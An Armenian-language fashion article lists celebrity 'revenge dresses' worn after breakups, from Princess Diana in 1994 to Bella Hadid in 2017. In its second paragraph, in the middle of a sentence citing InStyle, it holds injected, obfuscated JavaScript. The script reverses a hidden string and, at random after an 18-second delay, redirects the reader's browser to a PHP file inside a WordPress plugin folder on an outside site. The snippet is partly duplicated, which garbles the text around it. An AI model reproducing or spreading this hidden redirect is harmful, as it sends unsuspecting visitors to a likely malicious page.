Աստղերի ամենահայտնի վրիժառու զգեստները

Բաժանումները երբեք էլ հեշտ չեն եղել: Միշտ պահանջվում է մի որոշ ժամանակ, որպեսզի կինը դուրս գա դեպրեսիվ իրավիճակից: Սակայն գալիս է մի պահ, երբ կարծես կախարդական ինչ-որ բան է պատահում, և դուք, վերջապես պատրաստ եք վերադառնալ աշխարհ և ցույց տալ մարդկանց, որ անցել եք կյանքի այս դժվարին ժամանակաշրջանը և մոռացել եք նրան:

Սա այն պահն է, երբ դուք պետք է հագնեք ձեր վրեժի զգեստը: Այս մասին գրում է $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory-of-the-revenge-dress”>«InStyle» պարբերականը: Պարբերականը ներկայացրել է այս տերմինի ծագումը և մեջ բերել պատմության մեջ ամենահայտնի վրեժի զգեստները:

Կհավատաք, թե ոչ, այս տերմինն իրականում բավականին արիստոկրատական ծագում ունի:

Լեդի Դի-ն և իր վրիժառու զգեստը

1994 թ. նոյեմբերին արքայադուստր Դիանան արքայազն Չարլզից բաժանման արդյունքում հայտնվեց հանրային քննարկումների էպիկենտրոնում: Բոլոր արքայական պարբերականներն անդրադառնում էին նրա զգեստին:  Հենց այդ գիշերը, Դիանան մասնակցեց Լոնդոնում անցկացվող ինչ-որ խնջույքի` ձմեռային շքեղ սև, ուսերը բաց զգեստով: Այսպես ստեղծվեց վրեժի զգեստը:

Իհարկե, Դիանան արդեն հայտնի էր, որպես թագավորական թրենդ թելադրող, սակայն մինչ այդ գիշեր, նրա տեսքը երբևէ այդքան սեքսուալ չէր եղել: Այդ զգեստը նորաձևության մեջ մեծ հեղաշրջում էր: Եվ այժմ, ավելի քան 20 տարի անց, բաժանումներից հետո կանանց մեջ արթնանում է ներքին Լեդի Դի-ն:

Ահա և պատմության մեջ ամենատպավորիչ վրեժի զգեստները.

Նիկոլ Քիդմանը՝ «The Others» ֆիլմի պրեմիերայի ժամանակ (2001թ)

Նիկոլ Քիդմանը և իր վրիժառու զգեստը

Ամուսնալուծությունից հետո, Նիկոլ Քիդմանը դուրս եկավ հանրության առաջ այս սև, պարզ և բաց զգեստով: Թոմ Կրուզը, ով արդեն 6 ամիս էր, ինչ դերասանուհուց առանձին էր ապրում, ևս ներկա էր պրեմիերային` որպես ֆիլմի դրոդյուսեր:

 

 

 

 

 

 

 

 

Բրիթնի Սփիրսը «Crossroads»-ի պրեմիերայի ժամանակ (2002թ)

Բրիթնի Սփիրսը և իր վրիժառու զգեստը

Երկրպագուները հասկացան, որ փոփի աշխարհում  ինչ-որ բան այն չէ, երբ տեսան Սփիրսին առանց Ջասթին Թիմբերլեյքի: Սակայն երգչուհին` այս շքեղ մետալիկ զգեստով, անկրկնելի տեսք ուներ:

 

 

 

 

 

 

Ջենիֆեր Էնիսթոնը «Derailed» ֆիլմի պրեմիերային (2005թ)

Ջենիֆեր Էնիստթոնը և իր վրիժառու զգեստը

Սա իր առաջին պրեմիերան էր Բրեդ Փիթից բաժանումից հետո: Նրա կրած Շանելի այս յուրօրինակ զգեստը «փակեց» բոլորի բերանները:

 

 

 

 

 

 

 

 

Եվա Լոնգորիան` Գոլդեն Գլոբսի ժամանակ (2011)

Եվա Լոնգորիան և իր վրիժառու զգեստը

Գեղեցիկ, կրքոտ և դրամատիկ: Ահա, թե ինչպես է Լոնգորիան առաջին անգամ ներկայացել որպես միայնակ կին:


 

 

 

 

 

 

Քիմ Քարդաշյանը` նոր տարվա խնջույքին (2011թ)

Քիմ Քարդաշյանը և իր վրիժառու զգեստը

Նոր զգեստներ, նոր բացվածքներ, նոր տարի: Գուչիի այս շլացուցիչ զգեստով, Քարդաշյանը հրաժեշտ տվեց Քրիս Համֆրիսին և 2011 թվականին:

 

 

 

 

 

 

Ջենիֆեր Լոպեզը IHEARTRADIO-ի Երաժշտական փառատոնի ժամանակ  (2011)

Ջենիֆեր Լոպեզը և իր վրիժառու զգեստը

Մարկ Էնթոնիից բաժանվելուց անմիջապես հետո, երգչուհին հանդես եկավ այս սպիտակ մինի զգեստով:

 

 

 

 

 

 

Բելլա Հադիդը Մեթ Գալայի ժամանակ (2017թ)

Բելլա Հադիդը և նրա վրիժառու զգեստըԵրբ քո նախկինը` Ուիքենդը պատրաստվում է Սելենա Գոմեսի հետ այցելել այն նույն վայրն ինչ դու, դու պարզապես չես կարող սովորական տեսք ունենալ: Ահա թե ինչպես է Բելլա Հադիդը որոշել դուրս գալ այդ դրությունից: